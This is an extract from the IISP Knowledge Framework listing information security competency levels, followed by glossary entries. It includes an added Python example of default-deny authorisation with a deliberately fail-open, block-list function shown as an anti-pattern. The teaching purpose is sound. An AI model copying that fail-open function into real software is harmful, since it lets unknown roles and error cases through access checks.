Protection Act, privacy, healthcare, ISO/IEC 27000 family) and legislation and regulation relevant to own work.
They shall be able to list the major applicable legislation and regulations affecting an example organisation
and describe their overall purpose.
They shall be able to name or describe who in an organisation they should go to consult about legislation and
regulation.
Level 2
Can explain the principal requirements of major legislation and regulations relevant to Information Security,
and those legal and regulatory instruments relevant to own work.
They shall be able to explain:
• In reasonable detail all of the applicable legislation and regulation pertinent to an organisation.
• The consequences of non-compliance with major legislation and regulation.
They should be able to explain when an organisation is non-compliant with major legislation and regulation.
They shall be able to explain how legislation or regulations could influence governance arrangements within an
organisation.
Security Discipline: Information Security Governance and Management
Skill Area: Third Party Management (Ref: A7)
Identifies and advises on the technical, physical, personnel and procedural risks associated with third party
relationships, including systems development and maintenance, outsourced service providers and business
partners.
Assesses the level of confidence that third party Cyber and Information Security capabilities/services operate as
defined.
Level 1
Recognises the need for organisations to manage the Information Security of third parties and can describe
the impacts of failure to do so.
They shall be able to describe the consequences to an organisation of failing to manage third parties
effectively.
They shall be able to list the relevant legislation and regulations that third parties must comply with.
They shall be able to list the relevant policies and standards that third parties should comply with.
Level 2
Can explain the main security issues associated with third party relationships and how these can be managed
effectively.
They shall be able to explain the relevant legislation and regulations that third parties must comply with, and
why.
They shall be able to explain the relevant policies and standards that third parties must comply with, and why.
They shall be able to summarise the relevant contractual terms and conditions of an Information Security
nature in third party contracts in their business area.
Security Discipline: Threat Assessment and Information Risk Management
Skill Area: Threat Intelligence and Assessment, and Threat Modelling (Ref: B1)
Assesses and validates information on current and potential Cyber and Information Security threats to the
business, analysing trends and highlighting information security issues relevant to the organisation, including
Security Analytics for Big Data.
Processes, collates and exploits data, taking into account its relevance and reliability to develop and maintain
‘situational awareness’.
Predicts and prioritises threats to an organisation and their methods of attack.
Analyses the significance and implication of processed intelligence to identify significant trends, potential threat
agents and their capabilities.
Uses human factor analysis in the assessment of threats.
Uses threat intelligence to develop attack trees.
Prepares and disseminates intelligence reports providing threat indicators and warnings.
Level 1
Can describe the concepts and principles of threat intelligence, modelling and assessment.
They shall be able to describe the purpose of threat modelling.
They shall be able to describe the concept of a threat and a threat agent.
Level 2
Can explain the principles of threat intelligence, modelling and assessment. This might include experience of
applying threat intelligence, modelling and assessment principles in a training or academic environment, for
example through participation in syndicate exercises, undertaking practical exercises, and/or passing a test or
examination.
They shall be able to describe different types of threat models, including attack trees.
They shall be able to describe a number of threats to an organisation.
They shall be able to describe a number of threat agents to an organisation.
They shall be able to explain the role of threat intelligence and threat modelling in undertaking risk
assessments.
Security Discipline: Threat Assessment and Information Risk Management
Skill Area: Risk Assessment (Ref: B2)
Identifies and assesses information assets; uses this information and relevant threat assessments, business
impacts, business benefits and costs to conduct risk assessments and identify potential vulnerabilities.
Level 1
Can describe the concepts and principles of risk assessment.
They shall be able to describe risk components such as: information risk, asset, threat agent, vulnerability,
impact and likelihood.
They shall be able to list at least one risk management methodology.
They shall be able to list sources of information on threats and vulnerabilities.
Level 2
Can explain the principles of risk assessment. This might include experience of applying risk assessment
principles in a training or academic environment, for example through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test or examination.
They shall be able to explain in detail at least one risk assessment methodology.
They shall be able to explain sources of threat to an organisation.
They shall be able to explain the role of threat intelligence and threat modelling in undertaking risk
assessments.
They shall be able to explain different types of vulnerabilities within a typical organisation.
Security Discipline: Threat Assessment and Information Risk Management
Skill Area: Information Risk Management (Ref: B3)
Develops Cyber and Information Security risk management strategies and controls, taking into account business
needs and risk assessments, and balancing technical, physical, procedural and personnel controls.
Level 1
Can describe the concepts and principles of Information Security risk management.
They shall be able to list different types of controls to manage risks.
They shall be able to describe the difference between technical, physical, procedural and personnel controls.
They shall be able to describe the difference between risk assessment and risk treatment.
They shall be able to name at least one risk management methodology.
Level 2
Can explain the principles of risk management. This might include experience of applying risk management
principles in a training or academic environment, for example through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test or examination.
They shall be able to explain in detail one risk management methodology and the associated processes.
They shall be able to explain the following terms and their relationship:
• Residual Risk.
• Risk Acceptance.
• Risk Avoidance.
• Risk Retention.
• Risk Sharing.
• Risk Tolerance.
• Risk Appetite.
They shall be able to explain different types of controls to mitigate risks.
Security Discipline: Implementing Secure Systems
Skill Area: Enterprise Security Architecture (Ref: C1)
Working with Enterprise Architects, takes customer security requirements and assists in the development of an
Enterprise Security Architecture.
Interprets relevant security policies and threat/risk profiles into secure architectural solutions that mitigate the
risks and conform to legislation and relate to business needs.
Applies common architectural frameworks (e.g. TOGAF, SABSA).
Presents security architecture solutions as a view within broader IT architectures.
Maintains awareness of the security advantages and vulnerabilities of common products and technologies.
Designs robust and fault-tolerant security mechanisms and components appropriate to the perceived risks.
Develops and implements appropriate methodologies, templates, patterns and frameworks.
Level 1
Can describe the concept of an enterprise Information Security architecture and how it can be used to reduce
information risk.
Can describe how an enterprise security architecture can relate to business needs.
They shall be able to name at least one common architectural framework.
They shall be able to name at least one design pattern.
Level 2
Can explain the concept of an enterprise Information Security architecture, how it relates to business needs
and how it can be used to reduce information risk. This might include experience of applying these concepts in
a training or academic environment, for example through participation in syndicate exercises, undertaking
practical exercises, and/or passing a test or examination.
They shall be able to explain at least one common architectural framework and provide the pros and cons of
that framework.
They shall be able to describe at least one design pattern and explain the business benefits.
They shall be able to explain how legislation, regulations and policies can influence an Enterprise Security
Architecture.
Security Discipline: Implementing Secure Systems
Skill Area: Technical Security Architecture (Ref: C2)
Contributes to the development of Computer, Network and Storage Security Architecture, incorporating
hosting, infrastructure applications and cloud based solutions as covered by the role of Chief Security Architect.
Interprets relevant security policies and threat/risk profiles into secure architectural solutions that mitigate the
risks and conform to legislation and relate to business needs.
Presents security architecture solutions as a view within broader IT architectures.
Applies security architecture principles to networks, IT systems, Control Systems (e.g. SCADA, ICS),
infrastructures and products.
Devises standard solutions that address requirements delivering specific security functionality whether for a
business solution or for a product.
Maintains awareness of the security advantages and vulnerabilities of common products and technologies.
Designs robust and fault-tolerant security mechanisms and components appropriate to the perceived risks.
Uses appropriate methodologies and frameworks.
Level 1
Can describe the principles of a technical security architecture and how these can be used to reduce
information risk.
They shall be able to list a number of different technical security controls and describe their purpose.
They shall be able to name several important security design principles.
They shall be able to recognise the importance of secure configuration and hardening and their role in
building secure systems.
Level 2
Can explain the principles of a computer system, network or storage security architecture and how these can
be used to reduce information risk. This might include experience of applying these concepts in a training or
academic environment, for example through participation in syndicate exercises, undertaking practical
exercises, and/or passing a test or examination.
They shall be able to explain a wide range of different technical security techniques, mechanisms and
technologies, including:
• Access control.
• Auditing and alerting.
• Content control.
• Cryptography.
• Detection.
• Identification and Authentication.
• Security Management.
• Trusted communications.
They shall be able to explain at least one design pattern.
They shall be able to explain a number of different security design principles such as:
• Defence in depth.
• Compartmentalise.
• Least Privilege.
• Separation of Duties.
• Secure the Weakest Link.
• Fail Securely.
• Minimisation.
They shall be able to explain the purpose of secure configuration and hardening and their role in building
secure systems.
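Three of the design principles named above (Least Privilege, Separation of Duties, Fail Securely) in working code, as an added example that is not from the IISP framework. The roles, the payment workflow and the names (ROLE_PERMISSIONS, authorize, authorize_fail_open, Payment) are assumptions chosen to make the principles concrete; the second function is the fail-open anti-pattern, included only for contrast:

```python
"""Default-deny authorisation illustrating Least Privilege, Separation of
Duties and Fail Securely. Added example; the roles, actions and payment
workflow are assumptions, not anything from the IISP framework."""
from dataclasses import dataclass

# Least Privilege: each role carries only the permissions its job needs.
ROLE_PERMISSIONS = {
    "clerk": frozenset({"payment:create", "payment:read"}),
    "approver": frozenset({"payment:approve", "payment:read"}),
    "auditor": frozenset({"payment:read"}),
}

# Anti-pattern for contrast: a block-list. Anything not explicitly blocked
# is allowed, so a new action or an unknown role slips straight through.
ROLE_BLOCKED = {
    "clerk": frozenset({"payment:approve"}),
    "auditor": frozenset({"payment:create", "payment:approve"}),
}


@dataclass(frozen=True)
class Payment:
    payment_id: str
    created_by: str  # user who raised the payment
    amount: int


def permissions_for(roles):
    """Union of the roles' permissions; an unknown role contributes nothing."""
    perms = set()
    for role in roles:
        perms |= ROLE_PERMISSIONS.get(role, frozenset())
    return perms


def authorize(user, roles, action, payment=None):
    """Default deny: True only when an explicit allow rule matches.

    Fail Securely: a malformed request (roles not iterable, an approval
    with no Payment) raises inside the try and the answer is "deny",
    never "allow". In production the exception would also be logged.
    """
    try:
        if action not in permissions_for(roles):
            return False
        if action == "payment:approve":
            # Separation of Duties: the creator may not approve their own payment.
            if payment.created_by == user:
                return False
        return True
    except Exception:
        return False


def authorize_fail_open(user, roles, action, payment=None):
    """What NOT to do: a block-list lookup that falls through to allow, and
    an error handler that "keeps the business running" by allowing."""
    try:
        for role in roles:
            if action in ROLE_BLOCKED.get(role, frozenset()):
                return False
        return True
    except Exception:
        return True
```

With a payment raised by alice, authorize("alice", ["approver"], "payment:approve", p) is False while the fail-open version returns True; an unknown role such as "intern", or roles=None, is likewise denied by the first function and admitted by the second. The lesson is that every path not covered by an explicit allow, including the error path, must end in deny.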
Security Discipline: Implementing Secure Systems
Skill Area: Secure Development (Ref: C3)
Implements secure systems, products and components using an appropriate methodology.
Defines and/or implements secure development standards and practices including, where relevant, formal
methods.
Selects and/or implements appropriate test strategies.
Defines and/or implements appropriate secure change and fault management processes.
Verifies that a developed component, product or system meets its security criteria (requirements and/or policy,
standards & procedures).
Specifies and/or implements processes that maintain the required level of security of a component, product, or
system through its lifecycle.
Manages a system or component through a formal security assessment.
Level 1
Recognises the benefits of addressing security during system development and can list some of the tools,
products and practices that contribute to secure development.
They shall be able to list the typical stages of a Security Development Lifecycle and the role of security within
each stage:
• Requirements.
• Design.
• Implementation.
• Verification.
• Release.
They shall be able to describe the benefits of introducing security early into the development lifecycle.
They shall be able to name who in an organisation they should go to consult about secure development and/or
what development practices are in place.
They shall be able to list a number of secure coding standards used by an organisation.
They shall be able to describe different types of testing such as functional testing, static code analysis and
fuzzing.
Level 2
Can explain the benefits of addressing security during system development.
Can describe some of the tools, products and practices that contribute to secure development.
They shall be able to explain the Security Development Lifecycle used within an organisation.
They shall be able to explain the tools in use and their role in the Security Development Lifecycle.
They shall be able to explain the purpose of secure coding standards.
They shall be able to explain the purpose of different types of testing such as functional testing, static code
analysis and fuzzing.
They shall be able to describe the personnel, procedural, physical, and technical security necessary for a secure
development site.
Security Discipline: Assurance, Audit, Compliance and Testing
Skill Area: Internal and Statutory Audit (Ref: D1)
Verifies that information systems and processes meet the security criteria (requirements or policy, standards
and procedures).
Assesses the business benefits of security controls.
Level 1
Can describe the requirements for and basic principles involved in conducting security audits of information
systems.
They shall be able to describe the overall process of an audit.
They shall be able to list a number of standards that audits can be performed against.
Level 2
Can explain the main principles and processes involved in conducting an audit. This might include experience
of applying these principles in a training or academic environment, for example through participation in
syndicate exercises, undertaking practical exercises, and/or passing a test or examination.
They shall be able to explain in detail the process of an audit.
They shall be able to explain how an audit can test compliance with policy, standards, procedures and controls.
They shall be able to explain an auditing standard (e.g. ISO/IEC 27001).
Security Discipline: Assurance, Audit, Compliance and Testing
Skill Area: Compliance Monitoring and Controls Testing (Ref: D2)
Defines and implements processes to verify on-going conformance to security and/or regulatory requirements.
Carries out security compliance checks in accordance with an appropriate methodology.
This Skill covers compliance checks and tests against technical, physical, procedural and personnel controls.
Level 1
Can describe the benefits of compliance monitoring and list the common compliance monitoring standards,
e.g. ISO/IEC 27001, PCI DSS, IAMM.
They shall be able to name at least one standard in this area and the business areas it would typically be
applied to.
They shall be able to describe the benefits of compliance monitoring.
Level 2
Can explain the main principles and processes involved in conducting a compliance monitoring exercise. This
might include experience of applying these principles in a training or academic environment, for example
through participation in syndicate exercises, undertaking practical exercises, and/or passing a test or
examination.
They shall be able to explain in detail at least one common standard in this area.
They shall be able to describe how compliance monitoring could be achieved against different controls.
Security Discipline: Assurance, Audit, Compliance and Testing
Skill Area: Security Evaluation and Functionality Testing (Ref: D3)
Contributes to the security evaluation or testing of software.
Evaluates security software by analysing the design documentation and code to identify potential vulnerabilities
and testing to ascertain whether these are exploitable.
Tests the security functionality of systems or applications for correctness in line with security policies, standards
and procedures, and advises on corrective measures.
Applies recognised evaluation/testing methodologies, tools and techniques, developing new ones where
appropriate.
Assesses the robustness of a system, product or technology.
Applies commonly accepted governance practices and standards when testing in an operational environment.
Level 1
Can describe the principal concepts of security evaluation and functional testing to support Information
Security.
Recognises that security testing cannot guarantee security.
They shall be able to describe the difference between white box and black box testing.
They shall be able to recognise the difference between positive and negative testing.
They shall be able to recognise the difference between testing application functionality, code, vulnerability
assessments and penetration testing.
They shall be able to describe the purpose of independent assurance.
They shall be able to name at least one independent assurance scheme.
Level 2
Can explain the principal concepts of security evaluation or functional testing and how these are applied in
practice. This might include experience of applying these concepts in a training or academic environment, for
example through participation in syndicate exercises, undertaking practical exercises, and/or passing a test or
examination.
They shall be able to explain the typical structure of a security test plan.
They shall be able to explain a number of tools in use by an organisation.
They shall be able to explain the purpose of a number of independent assurance schemes.
Security Discipline: Assurance, Audit, Compliance and Testing
Skill Area: Penetration Testing (Ref: D4)
Contributes to the scoping and conduct of vulnerability assessments and tests for public domain vulnerabilities
and assessment of the potential for exploitation, where appropriate by conducting exploits. Reports potential
issues and mitigation options.
Contributes to the review and interpretation of reports. Co-ordinates and manages Remediation Action Plan
(RAP) responses.
This skill covers, but is not limited to, penetration testing against networks and infrastructures, web
applications, mobile devices and control systems.
Level 1
Can describe the principles of penetration testing and list the common types of penetration test (e.g.
infrastructure, web applications). Recognises the difference between a vulnerability assessment and a
penetration test.
They shall be able to recognise the difference between testing application functionality, code, vulnerability
assessments and penetration testing.
They shall be able to describe the main stages of a test, e.g. scope, test, report, fix, re-test.
They shall be able to name a few of the more common testing tools (e.g. nmap/Zenmap, Nessus, Metasploit,
Burp Suite).
Level 2
Can explain the principles, the main components of an infrastructure penetration test and the high level
processes involved. This might include recognised training in infrastructure penetration testing involving
practical exercises in using these skills.
They shall be able to explain the structure and content of a typical scoping document.
They shall be able to explain the structure and content of a typical Remediation Action Plan.
They shall be able to describe the functionality of several testing tools and explain what type of tools would be
used in what situation.
Security Discipline: Operational Security Management
Skill Area: Secure Operations Management (Ref: E1)
Establishes processes for maintaining the security of information throughout its existence including establishing
and maintaining Security Operating Procedures in accordance with security policies, standards and procedures.
Coordinates penetration and other testing on information processes.
Assesses and responds to new technical, physical, personnel or procedural vulnerabilities. Engages with the
Change Management process to ensure that vulnerabilities are remediated.
Manages the implementation of information security programmes, and co-ordinates security activities across
the organisation.
Level 1
Recognises the need for secure management of Information Systems and can list some of the types of incident
which could occur if this is not done.
They shall be able to describe the potential for security incidents if systems and processes are not managed
securely.
They shall be able to name several security operating procedures within an organisation and summarise their
purpose.
They shall be able to describe the process of reporting security incidents within an organisation.
They shall be able to describe the purpose of patch management, change management and deployment/release
management.
Level 2
Understands and can explain the main processes for managing the security of information systems. This might
include experience of applying these concepts in a training or academic environment, for example through
participation in syndicate exercises, undertaking practical exercises, and/or passing a test or examination.
They shall be able to explain most of the security operating procedures within an organisation and explain
their purpose.
They shall be able to explain what a typical security operating procedure looks like.
They shall be able to explain the common causes of security incidents and how security operating procedures
help to mitigate these risks.
They shall be able to explain the purpose of vulnerability management.
They shall be able to explain the role of vulnerability assessments and penetration testing in maintaining the
security of a system.
They shall be able to explain patch management, change management and deployment/release management
processes.
IISP Knowledge Framework Version 1.0 August 2017 Page 129 of 195
Security Discipline: Operational Security Management
Skill Area: Secure Operations & Service Delivery (Ref: E2)
Securely configures and maintains information, control and communications equipment in accordance with
relevant security policies, standards and guidelines. This includes the configuration of Information Security
devices (e.g. firewalls) and protective monitoring tools (e.g. SIEM).
Implements security policy (e.g. patching policies) and Security Operating Procedures in respect of system
and/or network management.
Undertakes routine technical vulnerability assessments.
Maintains security records and documentation in accordance with Security Operating Procedures.
Administers logical and physical user access rights.
Monitors processes for violations of relevant security policies (e.g. acceptable use, security, etc.).
Level 1
Recognises the need for information systems and services to be operated securely and can list some of the main policies and practices involved in achieving this.
They shall be able to name who in an organisation they should go to consult about secure configuration of various systems and devices.
They shall be able to name a few of the more common vulnerability assessment tools (e.g. nmap/Zenmap, Nessus).
They shall be able to describe what a typical organisation’s patching policy would look like.
They shall be able to describe what a typical organisation’s antivirus signature update policy would look like.
They shall be able to recognise non-compliance with most security policies.

Level 2
Can explain the main principles of secure configuration of security components and devices, including firewalls and protective monitoring tools (e.g. SIEM). This might include experience of applying these principles in a training or academic environment, for example through participation in syndicate exercises, undertaking practical exercises, and/or passing a test or examination.
They shall be able to list most of the standards in the organisation for secure configuration of systems and devices.
They shall be able to explain the principles of secure configuration.
They shall be able to explain the purpose and principles of protective monitoring.
They shall be able to explain the functionality of several vulnerability assessment tools.
They shall be able to explain an organisation’s patching policy.
They shall be able to explain the antivirus signature update policy.
They shall be able to explain why non-compliance with a particular security policy has occurred.
They shall be able to explain the difference between network routers, network switches and stateful firewalls.
Security Discipline: Incident Management, Investigation and Digital Forensics
Skill Area: Intrusion Detection and Analysis (Ref: F1)
Monitors network and system activity to identify potential intrusion or other anomalous behaviour. Analyses
the information and initiates an appropriate response, escalating as necessary.
Uses security analytics, including the outputs from intelligence analysis, predictive research and root cause
analysis in order to search for and detect potential breaches or identify recognised indicators and warnings.
Monitors, collates and filters external vulnerability reports for organisational relevance, ensuring that relevant
vulnerabilities are rectified through formal change processes.
Ensures that disclosure processes are put in place to restrict the knowledge of new vulnerabilities until
appropriate remediation or mitigation is available.
Produces warning material in a manner that is both timely and intelligible to the target audience(s).
Level 1
Recognises the need for intrusion detection and analysis to maintain Information Security and can describe the difference between intrusion prevention and intrusion detection.
They shall be able to list several sources of external vulnerability reports relevant to an organisation.
They shall be able to name who in an organisation they should go to consult about a new vulnerability.
They shall be able to describe the process for identifying, analysing and reporting potential intrusions.
They shall be able to describe protective monitoring.

Level 2
Can explain the basic principles involved in monitoring network and system activity for anomalous behaviour and how the results can be used. This might include experience of applying these principles in a training or academic environment, for example through participation in syndicate exercises, undertaking practical exercises, and/or passing a test or examination.
They shall be able to explain a number of sources of vulnerability reports relevant to an organisation.
They shall be able to interpret external vulnerability reports and establish whether they are relevant to the organisation.
They shall be able to explain the process for reporting a new vulnerability.
They shall be able to explain how anomalous network or system activity could be detected using protective monitoring.
They shall be able to explain the process of creating warning material and how it should be tailored for the target audience.
They shall be able to explain the difference between NIDS, NIPS, HIDS and HIPS.
Security Discipline: Incident Management, Investigation and Digital Forensics
Skill Area: Incident Management, Incident Investigation and Response (Ref: F2)
Engages with the overall organisation Incident Management process to ensure that Information Security
incidents are handled appropriately.
Defines and implements processes and procedures for detecting and investigating Information Security
incidents.
Establishes and maintains a Computer Security Emergency Response Team or similar to deal with Information
Security incidents.
Working within the legal constraints imposed by the jurisdictions in which an organisation operates, carries out
an investigation into a security incident using all relevant sources of information.
Assesses the need for Forensic activity, and coordinates the activities of specialist Forensic personnel within the
overall response activities, engaging with the relevant organisational processes to ensure that Forensic services
are deployed appropriately.
Provides a full Information Security investigation capability where third parties, managed service providers, etc.
are involved.
Co-ordinates the response to an Information Security incident.
Level 1
Recognises the benefits of managing Information Security incidents and can describe the basic principles of incident management, investigation and response.
Can describe how incident management can operate effectively, benefiting the organisation.
Understands the need to preserve evidence to support any investigation.
They shall be able to describe what is meant by an information security incident.
They shall be able to describe what is meant by an information security investigation.
They shall be able to describe potential business impacts of security incidents upon confidentiality, integrity, availability and reputation in their organisation.
They shall be able to describe the main stages of incident management, e.g. identify, contain, cleanse, recover, close.
They shall be able to name who in their organisation they should report to if a security incident occurs, e.g. Computer Security Emergency Response Team.

Level 2
Can explain the basic principles of incident management, investigation and response. Can explain how incident management can operate effectively, benefiting the organisation.
Understands the need to preserve evidence to support any investigation and can explain the basic principles involved.
They shall be able to explain in detail the incident reporting process.
They shall be able to explain the processes, procedures, methods, tools and techniques used to conduct incident management activities within the organisation.
They shall be able to explain the processes, procedures, methods, tools and techniques used to conduct investigations.
They shall be able to explain the role of digital forensics in conducting investigations.
Security Discipline: Incident Management, Investigation and Digital Forensics
Skill Area: Forensics (Ref: F3)
Secures the scene and captures evidence in accordance with legal guidelines and in the most effective manner,
minimising disruption to the business while maintaining evidential weight, using specialist equipment as
appropriate.
Analyses the evidence to identify breaches of policy, regulation or law, including the presence of malware.
Presents evidence as appropriate, acting as an expert witness if necessary.
Level 1
Can describe the basic principles of digital forensics and recognises the capability of forensics to support investigations.
They shall be able to describe what information can be collected to support forensic examination.
They shall be able to list possible sources of digital forensic information.
They shall be able to describe the requirements to preserve forensic evidence.
They shall be able to name who in an organisation they should go to arrange for a forensics examination.

Level 2
Can explain the basic principles of digital forensics, including the principles and processes surrounding securing and analysing evidence. This might include experience of applying these principles in a training or academic environment, for example through participation in syndicate exercises, undertaking practical exercises, and/or passing a test or examination.
They shall be able to explain examples of information recoverable through forensics.
They shall be able to explain the term “Continuity of Evidence”.
They shall be able to explain the processes, procedures, methods, tools and techniques used to conduct forensic examinations.
They shall be able to explain relevant legislation and guidance, e.g. Data Protection Act (DPA), Regulation of Investigatory Powers Act (RIPA).
They shall be able to explain the purpose of a Forensics Readiness Plan.
Security Discipline: Business Resilience
Skill Area: Business Continuity and Disaster Recovery Planning (Ref: H1)
Contributes to defining the need for, and the development of, Business Continuity Management (BCM) and
Disaster Recovery (DR) Plans, Processes or Functions.
Level 1
Recognises the importance of Business Continuity & Disaster Recovery Planning to Information Security, and can list some of the potential consequences if these aspects are not properly considered.
They shall be able to describe how business continuity planning contributes to information security objectives.
They shall be able to recognise the difference between business continuity and disaster recovery.
They shall be able to describe a number of different business continuity threats to an organisation.
They shall be able to name the ISO standards relevant to business continuity (e.g. ISO 22301).
They shall be able to describe the contents of a typical business continuity policy and business continuity standard.

Level 2
Can explain and give examples of how Business Continuity and Disaster Recovery Planning contributes to Information Security.
They shall be able to explain why business continuity and disaster recovery plans should be tested.
They shall be able to explain the types of IT/technology disaster scenarios that may impact an organisation.
They shall be able to explain the different types of disruptive events that may impact an organisation.
They shall be able to explain the structure and contents of a typical business continuity policy and business continuity standard.
Security Discipline: Business Resilience
Skill Area: Business Continuity and Disaster Recovery Management (Ref: H2)
Contributes to the implementation, operation and maintenance of BC and DR Processes or Functions.
Level 1
Recognises the importance of Business Continuity & Disaster Recovery management to Information Security, and can list some of the potential consequences if these aspects are not properly considered.
They shall be able to describe the business continuity management lifecycle.
They shall be able to recognise the difference between business continuity and disaster recovery.
They shall be able to name the ISO standards relevant to business continuity.

Level 2
Can explain and give examples of how Business Continuity and Disaster Recovery management contributes to Information Security.
They shall be able to explain why business continuity and disaster recovery plans should be tested.
They shall be able to explain disaster recovery options to meet the business needs to restore individual IT/technology systems, services and assets.
They shall be able to explain the business continuity management lifecycle.
They shall be able to explain the processes in a typical business continuity plan.
Security Discipline: Business Resilience
Skill Area: Cyber Resilience (Ref: H3)
Contributes to the development and implementation of processes to anticipate, recognise and defend against
changing Cyber and Information risk environments which threaten business stability, and to the development and
implementation of plans to introduce a holistic culture of Information Security across an organisation aimed at
identifying and reacting promptly and effectively to incidents.
Level 1
Can describe the principles and benefits of cyber resilience.
They shall be able to describe the different components of cyber resilience.
They shall be able to describe a number of potential cyber risks pertinent to their organisation.

Level 2
Can explain and give examples of how Cyber Resilience contributes to Information Security.
They shall be able to explain a wide number of potential cyber risks pertinent to their organisation.
They shall be able to explain how the following areas contribute to making an organisation resilient against cyber attacks:
• Threat Intelligence.
• Threat modelling.
• Various technical controls.
• Security Awareness.
• Business Continuity Management.
• Incident management.
Security Discipline: Information Security Research
Skill Area: Research (Ref: I1)
Conducts original investigation in order to gain knowledge and understanding relating to Information Security.
Defines research goals and generates original and worthwhile ideas in Information Security.
Writes or presents papers, either internally or externally, on the results of research.
Contributes to the development of the employing organisation’s Information Security research policy and
participates in or supervises the work of Information Security research functions.
Develops new or improved models or theories of Information Security.
Develops new cryptographic algorithms.
Level 1
Recognises the different types of Information Security research within own sector.
Can name at least one significant research paper that contributed to information security.
Can name at least one significant research activity that contributed to information security.

Level 2
Can describe and give examples of how research has improved information security.
Can explain the role of at least one significant research paper that contributed to information security.
Can explain at least one significant research activity that contributed to information security.
Security Discipline: Information Security Research
Skill Area: Applied Research (Ref: I2)
Vulnerability Research and Discovery, leading to the development of exploits, reverse engineering and
researching mitigation bypasses.
Cryptographic research leading to the assessment of existing algorithms.
In the Information Security field, uses existing knowledge in experimental development to produce new or
substantially improved devices, products and processes.
Level 1
Recognises the value of applied research in Information Security.
Can list some examples of applied research in information security.

Level 2
Understands the principles of applied research in Information Security and might have undertaken some directed practical examples in a training environment.
Can explain the principles and processes of conducting applied research.
Security Discipline: Management, Leadership, Business and Communications
Skill Area: Management, Leadership and Influence (Ref: J1)
Works effectively in teams, either as a member or leader.
Encourages and supports others to meet objectives and to develop as Information Security professionals.
Is a leader on Information Security issues, either locally or across an organisation.
Provides technical leadership in a professional field, either within an organisation or across an industry sector.
Level 1
Works cooperatively and professionally with others.
Recognises that others could be impacted by their own behaviour.
Recognises that others may have different values and views and is sensitive to this.
Recognises that it is important to encourage and support team spirit and morale, helping work to be enjoyable and stimulating for all.

Level 2
Has received recognised training in management and/or leadership.
Can explain why it is important to openly celebrate success and recognise accomplishments.
Can explain why it is important to empower colleagues by giving them the information and authority needed to complete tasks.
Can explain why it is important to provide support and feedback to encourage and develop colleagues.
Security Discipline: Management, Leadership, Business and Communications
Skill Area: Business Skills (Ref: J2)
Understands local or corporate business aims and uses this knowledge to maximise the cost-effectiveness of
Information Security.
Contributes to the development of cost-effective corporate Information Security strategy; takes action to
achieve greater corporate efficiency in line with strategic aims.
Takes reasoned decisions on Information Security based on business aims and influences.
Level 1
Understands local objectives and organisational aims and how own job supports them.
Works in a cost-effective manner.
Recognises that they need to monitor progress against objectives.
Recognises that they need to demonstrate a self-motivated attitude.

Level 2
Understands and supports organisational aims, and any regulations and laws that govern own organisation.
Can explain why it is important to work in a cost-effective manner.
Can summarise the business skills they are required to possess:
• Delivering.
• Managing Customer Relationships.
• Time management and planning.
• Effective decision making.
Security Discipline: Management, Leadership, Business and Communications
Skill Area: Communication and Knowledge Sharing (Ref: J3)
Communicates information clearly and in a manner relevant to the target audience.
Influences senior management.
Shares knowledge on Information Security.
Negotiates effectively on Information Security issues.
Level 1
Understands and interprets instructions effectively.
Communicates effectively with colleagues.
Can describe the required skills in this area:
• Accurate and clear communication.
• Writing in clear plain English.
• Listen and learn effectively from others.
• Constructive criticism.
• Importance of sharing information as necessary.

Level 2
Has clear written and verbal communication skills.
Shares information and knowledge with others.
Can explain different techniques and styles of sharing information (documents, slides, presentations, wikis etc.).
Can explain why it is important to produce work to a high standard, with well-reasoned arguments and clear conclusions.
Can explain why it is important to encourage and make useful contributions to open debate or complex discussions.
Security Discipline: Contributions to the Information Security Profession and Professional Development
Skill Area: Contributions to the Community (Ref: K1)
Undertakes activity to broaden awareness and knowledge of Information Security issues, including the risks
from social media use, in the wider community – e.g. moderating sessions at schools, community centres, etc.
Level 1
Recognises the need to educate the community on Information Security issues.

Level 2
N/A
Part 2: References
4. Common Terms
The following table contains a number of common terms and abbreviations used in the IISP Knowledge
Framework. Wherever possible an authoritative source has been used to obtain the definition – which is
contained in the right hand column of the table.
As there are many sources for definitions it has been decided that the following priority will be used.
• ISO/IEC 27000 family.
• ISO Guide 73.
• Other ISO Standards.
• OWASP.
• NISTIR 7298.
• NIST Special Publication 800-145 - The NIST Definition of Cloud Computing.
• NIST Special Publication 800-146 - Cloud Computing Synopsis and Recommendations.
• Oxford English Dictionary.
Where an authoritative definition cannot be found from the above list IISP has provided a definition.
Term Definition Source
Acceptable Use Policy: An Acceptable Use Policy (AUP) is a set of rules applied by the owner of an information system, which restrict the ways in which it may be used and set guidelines as to how it should be used. Typically users sign up and accept the AUP or their employment contracts make it mandatory to conform.

Access Control: Means to ensure that access to assets is authorized and restricted based on business and security requirements. [Source: ISO/IEC 27000:2016]

Access Control List: A list of permissions attached to an object. It specifies which users or system processes (i.e. subjects) are granted access to objects, as well as what operations are allowed on given objects.

Access Management: Access management is the process of granting authorised users the right to use a service, while preventing access to non-authorised users. Access management can also be referred to as rights management.

Accountability: The security goal that generates the requirement for actions of an entity to be traced uniquely to that entity. This supports non-repudiation, deterrence, fault isolation, intrusion detection and prevention, and after-action recovery and legal action. [Source: NISTIR 7298]

Advanced Persistent Threat: A targeted attack against a specific entity that tries to avoid detection and steal information over a period of time. Usually, the attacker behind the APT will use several pieces of malware and security technologies to build up an attack.

Adware: Adware refers to any piece of software or application that displays advertisements, usually through pop-up or pop-under windows. While it may be disruptive to some users, adware is not inherently malicious.

Alert: “Instant” indication that an information system and network may be under attack, or in danger because of accident, failure or human error. [Source: ISO/IEC 27033-1:2009]

Algorithm: A process or set of rules to be followed in calculations or other problem-solving operations. [Source: Oxford English Dictionary]

Antivirus Software: A program that will prevent, detect and remediate certain types of malware infection on individual computing devices and IT systems.
Anything as a Service: Anything as a Service (XaaS) is a collective term used to refer to “X as a service” where “X” stands for the service being offered, for example ransomware!

Application Control: Application control blocks or restricts unauthorised applications from executing and hence only permits those that are approved to execute. Also known as application whitelisting.

Application Firewall: A type of firewall that follows and understands the application protocols traversing it and can deny/allow traffic based on the inspection of the application protocol.

Asset: A useful or valuable thing or person. [Source: Oxford English Dictionary]
A major application, general support system, high impact program, physical plant, mission critical system, personnel, equipment, or a logically related group of systems. [Source: NISTIR 7298]

Assurance: A positive declaration intended to give confidence; a promise. [Source: Oxford English Dictionary]
Authorisation: Authorization is the process of determining whether an authenticated subject (a user) can see, change, delete or take other actions upon data. For example, if you log into a time keeping application, submit your timesheet and then your boss approves it, the act of logging in is authenticating, the act of filling out your timesheet and submitting should only be something your user is authorized to do and approving the timesheet is something only the boss is authorized to do. [Source: OWASP]

